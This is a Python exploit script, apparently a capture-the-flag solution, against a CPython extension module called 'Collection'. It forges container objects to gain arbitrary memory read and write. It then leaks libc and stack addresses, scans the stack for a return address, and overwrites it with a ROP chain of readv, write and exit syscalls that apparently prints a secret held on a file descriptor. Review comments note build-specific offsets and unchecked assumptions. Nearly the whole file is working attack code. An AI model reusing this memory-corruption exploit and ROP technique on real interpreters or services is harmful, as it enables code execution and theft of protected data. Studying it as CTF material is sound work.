# Build-specific constants. Both offsets are taken from one particular
# binary/libc build and are not derived anywhere in this file, so any other
# build invalidates every address computed from them below.
offset_program_name = 0x3ec508  # added to the libc base to locate `program_name`
offset_libc = 0x408680  # subtracted from the leaked `dl_runtime` value to get the libc base
# Objects returned by the forged lookups in read()/write() are appended here;
# presumably this keeps them reachable so they are not collected — confirm.
roots = []
def read(addr):
    """Return the machine word expected to be found at ``addr``.

    The dict ``d`` is filled with fixed constants except for slot ``a4``,
    which receives ``addr``. The dict is wrapped in a ``Collection``; the
    address of that wrapper (CPython's ``id()`` is the object address) plus
    24 is then stored as the value of ``"a"`` in a second ``Collection``,
    and ``b.get("b")[0]`` is returned.

    NOTE(review): what ``Collection`` does with these values is not visible
    here — the slot layout, the constants ``0x9d3340`` / ``0x715620`` and
    the ``+ 24`` offset are all specific to one build of the extension and
    interpreter and must be confirmed against it. The fake object is kept
    in ``roots`` before returning, presumably so it stays reachable.
    """
    d = {}
    d["a1"] = 0x1
    d["a2"] = 0x9d3340
    d["a3"] = 0x4
    d["a4"] = addr  # the only caller-controlled slot
    d["a5"] = 0x4
    d["a6"] = 0x715620
    d["a7"] = 0x0
    d["a8"] = 0x0
    # Looks like a debugger memory dump of the intended layout; kept as-is.
    # 0x7ffff6153db0: 0x0000000000000001 0x00000000009ef7a0
    # 0x7ffff6153dc0: 0x0000000000000004 0x00007ffff6191790
    # 0x7ffff6153dd0: 0x0000000000000004 0x0000000000644a50
    # 0x7ffff6153de0: 0x0000000000000000 0x0000000000000000
    fakeContainer = Collection.Collection(d)
    collAddr = id(fakeContainer)  # CPython: id() is the object's address
    fakeArr = collAddr + 24  # fixed offset into the wrapper; build-specific
    # `a` is never used afterwards; presumably its allocation shapes the heap
    # so that `b` lands where expected — confirm.
    a = Collection.Collection({"a":1337, "b":[1.2]})
    b = Collection.Collection({"b":[1.3], "a":fakeArr})
    fakeobj = b.get("b")
    roots.append(fakeobj)
    return fakeobj[0]
def write(addr, val):
    """Store ``val`` as a machine word at ``addr``; returns ``None``.

    Mirrors ``read()``: the same dict layout with ``addr`` in slot ``a4``
    is wrapped in a ``Collection``, its address plus 24 is handed to a
    second ``Collection`` under key ``"a"``, and ``val`` is assigned to
    index 0 of ``b.get("b")`` instead of being read back.

    NOTE(review): as in ``read()``, the constants and the ``+ 24`` offset
    are specific to one build and are not derived here. No value is
    returned, so callers cannot tell whether the store took effect.
    """
    d = {}
    d["a1"] = 0x1
    d["a2"] = 0x9d3340
    d["a3"] = 0x4
    d["a4"] = addr  # the only caller-controlled slot
    d["a5"] = 0x4
    d["a6"] = 0x715620
    d["a7"] = 0x0
    d["a8"] = 0x0
    # Looks like a debugger memory dump of the intended layout; kept as-is.
    # 0x7ffff6153db0: 0x0000000000000001 0x00000000009ef7a0
    # 0x7ffff6153dc0: 0x0000000000000004 0x00007ffff6191790
    # 0x7ffff6153dd0: 0x0000000000000004 0x0000000000644a50
    # 0x7ffff6153de0: 0x0000000000000000 0x0000000000000000
    fakeContainer = Collection.Collection(d)
    collAddr = id(fakeContainer)  # CPython: id() is the object's address
    fakeArr = collAddr + 24  # fixed offset into the wrapper; build-specific
    # `a` is never used afterwards; presumably its allocation shapes the heap
    # so that `b` lands where expected — confirm.
    a = Collection.Collection({"a":1337, "b":[1.2]})
    b = Collection.Collection({"b":[1.3], "a":fakeArr})
    fakeobj = b.get("b")
    roots.append(fakeobj)
    fakeobj[0] = val
# Leak stage: start from one fixed address, derive the libc base from it, and
# from there a pointer into the stack. Every step rests on the hard-coded
# offsets above, so the printed addresses are only meaningful for that build.
dl_runtime = read(0x9b3010)  # fixed address; valid for this binary only
print("dl_runtime at 0x%x" % dl_runtime)
libc = dl_runtime - offset_libc
print("libc at 0x%x" % libc)
program_name = libc + offset_program_name
print("program name at 0x%x" % program_name)
stack = read(program_name)
# Round up to a multiple of 8. The adjustment is always at least 1 and is a
# full 8 when `stack` is already aligned (stack % 8 == 0), so the result is
# never the original value.
stack = stack + (8 - (stack % 8))
# `backup_stack` is reused later as scratch space (an iovec and a buffer are
# written there); `stack` itself is moved 0x800 bytes down before scanning.
backup_stack = stack
stack -= 0x800
print("stack at 0x%x" % stack)
program_range = [0x400000, 0x7be000]  # half-open [start, end) used by isInProgramRange
offset_libc_start_main = 0x21ab0  # not referenced in the visible part of this file
# Value searched for on the stack below; appears to match frame #7 of the
# backtrace comment that follows the scan loop.
needle = 0x0000000000506393
def isInProgramRange(v):
    """Return True when ``v`` lies in the half-open interval ``[program_range[0], program_range[1])``."""
    lower_bound = program_range[0]
    upper_bound = program_range[1]
    return lower_bound <= v < upper_bound
# Scan downward from `stack` one word at a time (at most 0x500 words) looking
# for `needle`. If it is never found the loop just runs out and `stack` is
# left at the last probed slot — nothing below checks for that case, so the
# writes that follow would then land at an unintended address.
for i in range(0x500):
    stack -= 8
    val = read(stack)
    if needle == val:
        print("GOT NEEDLE AT 0x%x" % stack)
        break
# Debugger backtrace showing where 0x506393 (the needle) sits as a return address:
#[#7] 0x506393 PyEval_EvalCode()
#[#8] 0x634d52 sub QWORD PTR [rbx], 0x1
#[#9] 0x634e0a PyRun_FileExFlags()
# Gadget addresses as fixed offsets from the libc base computed above; valid
# only for the exact libc build this was written against. The names describe
# the intended gadgets; nothing here verifies them.
pop_rdi = libc + 0x2155f
pop_rsi = libc + 0x23e6a
pop_rdx = libc + 0x1b96
pop_rax = libc + 0x439c8
syscall_ret = libc + 0xd2975
# Scratch data at `backup_stack`: an iovec whose base is backup_stack + 16 and
# whose length is 0x44 (68). Note the later write syscall uses 44 decimal, so
# the two lengths differ; whether that is intended is not visible here.
write(backup_stack, backup_stack + 16) # iovec structure
write(backup_stack + 8, 0x44)
# Each group below is nine words: register-setting gadgets alternating with
# their operands, then the syscall gadget; `stack += 72` skips exactly those
# nine words (9 * 8). Syscall numbers follow the x86-64 Linux table.
# readv(1023, iovec, 1)
write(stack, pop_rdi)
write(stack + 8, 0x00000000000003ff) # fd
write(stack + 16, pop_rsi)
write(stack + 24, backup_stack) # iovec
write(stack + 32, pop_rdx)
write(stack + 40, 1) # iocnt
write(stack + 48, pop_rax)
write(stack + 56, 19) # readv
write(stack + 64, syscall_ret)
stack += 72
# write(1, backup_stack + 16, 44)
write(stack, pop_rdi)
write(stack + 8, 1) # fd
write(stack + 16, pop_rsi)
write(stack + 24, backup_stack + 16) # buf
write(stack + 32, pop_rdx)
write(stack + 40, 44) # nbyte
write(stack + 48, pop_rax)
write(stack + 56, 1) # write
write(stack + 64, syscall_ret)
stack += 72
# exit(0): five words, no pop_rsi/pop_rdx needed
write(stack, pop_rdi)
write(stack + 8, 0) # statuscode
write(stack + 16, pop_rax)
write(stack + 24, 60) # exit
write(stack + 32, syscall_ret)